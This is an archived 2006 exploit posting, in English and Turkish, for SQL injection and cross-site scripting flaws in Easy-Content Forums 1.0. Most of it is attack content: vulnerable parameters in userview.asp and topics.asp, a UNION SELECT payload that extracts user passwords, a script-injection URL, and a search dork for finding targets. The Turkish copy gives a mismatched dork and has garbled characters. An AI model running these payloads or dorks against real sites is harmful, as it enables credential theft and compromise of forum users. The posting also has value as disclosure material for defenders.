Easy-Content Forums 1.0 Multiple [SQL/XSS] Vulnerabilities

2006-05-31 / 2006-06-01
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-79

ENGLISH # Title : Easy-Content Forums 1.0 Multiple SQL/XSS Vulnerabilities # Dork : "Copyright 2004 easy-content forums" # Author : ajann # Exploit; SQL INJECTİON-------------------------------------------------------- ### http://[target]/[path]/userview.asp?startletter=SQL TEXT ### http://[target]/[path]/topics.asp?catid=1'SQL TEXT =>catid=x Example: http://[target]/[path]/topics.asp?catid=1 union+select+0,password,0,0,0,0,0,0,0,0+from+tbl_forum_users XSS-------------------------------------------------------- ### http://[target]/[path]/userview.asp?startletter=xss TEXT ### http://[target]/[path]/topics.asp?catid=30&forumname=XSS TEXT Example: http://[target]/[path]/topics.asp?catid=30&forumname=%22%3E%3Cscript%3Ea lert%28%27X%27%29%3B%3C%2Fscript%3E %22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E == X # ajann,Turkey TURKISH # Başlık : Easy-Content Forums 1.0 Multiple SQL/XSS Vulnerabilities # Szck[Arama] : "powered by phpmydirectory" # Aığı Bulan : ajann # Aık bulunan dosyalar; SQL INJECTİON-------------------------------------------------------- ### http://[target]/[path]/userview.asp?startletter=SQL SORGUNUZ ### http://[target]/[path]/topics.asp?catid=1'SQL SORGUNUZ =>catid=Değişken rnek: http://[target]/[path]/topics.asp?catid=1 union+select+0,password,0,0,0,0,0,0,0,0+from+tbl_forum_users XSS-------------------------------------------------------- ### http://[target]/[path]/userview.asp?startletter=XSS KODLARINIZ ### http://[target]/[path]/topics.asp?catid=30&forumname=XSS KODLARINIZ rnek: http://[target]/[path]/topics.asp?catid=30&forumname=%22%3E%3Cscript%3Ea lert%28%27X%27%29%3B%3C%2Fscript%3E %22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E Ekrana X uyarısı ıkarıcaktır. Aıklama: userview.asp , topics.asp dosyalarında bulunan filtreleme eksikliği nedeniyle sql sorgu alıştırılabilmektedir. userview.asp , topics.asp dosyalarında bulunan filtreleme eksikliği nedeniyle xss kodları alışabilmektedir. # ajann,Turkiye


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top